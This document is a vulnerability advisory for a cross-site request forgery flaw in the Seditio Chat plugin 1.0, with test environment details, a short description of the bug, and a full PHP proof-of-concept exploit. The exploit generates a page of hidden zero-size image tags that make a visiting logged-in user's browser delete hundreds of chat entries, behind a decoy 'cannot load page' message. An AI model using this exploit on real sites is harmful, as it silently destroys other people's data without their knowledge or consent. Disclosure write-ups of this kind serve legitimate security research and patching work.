Seditio Chat plugin version 1.0 suffers from a cross site request forgery vulnerability.
06d094015e904ce08e8240eb9c7df829c02e6115b618f94827052ea9bfa99a16
=========================================================
Vulnerable Software: Seditio Chat Plugin (Chat İndex Plugin) v 1.0
http://www.seditio-eklenti.com/page.php?id=418
http://www.seditio-eklenti.com/chat-plugin-index-d418.html
Downloaded: http://www.seditio-eklenti.com/datas/users/1-chat.rar
(MD5 SUM: d1565b438199984661cf2147572724a6 *1-chat.rar)
=========================================================
Tested:
With Seditio v165
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
=========================================================
About Software:
Seditio Chat Plugin (Chat İndex Plugin) v 1.0 is popular plugin for Seditio CMS.
It gives ability to users~administrators~moderators to chatting.
=========================================================
Vuln Desc:
This plugin is prone to CROSS SITE REQUEST FORGERY vulnerability.
It uses $_GET without any proper check of request validity when deleting entries from chat.
It can be used by malicious people for delete chat entries.
================ Seditio chat plugin Delete chat entries CSRF exploit =================
<?php
/*
4 Fun
Seditio chat plugin Delete chat entries CSRF exploit (Sounds peacifull xD)
*/
$target='http://192.168.0.15/learn/128/sed/seditio165/'; // target site
$howmuch=500;// how much entries to "rm" in chat? :)
/* Do not change */
$body=str_repeat(PHP_EOL,300);
$howmuch=(int)$howmuch;
$sithere=strrev('OoPs! Can not Load Page.WTH? What about Refresh ?');// 4 think about :D.While we deleting chat entries:D
for($i=0;$i<=$howmuch;$i++)
{
$body.='<img src="'. $target . '/plug.php?e=chat&c=delete&id=' . $i . '" width="0" height="0" /><br>' .PHP_EOL;
}
die($body . '<h1>' . $sithere . '</h1>');
/* EOF */
?>
==============================EOF================================
/AkaStep ^_^
+++++++Greetz to all+++++++++++
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
Thank you.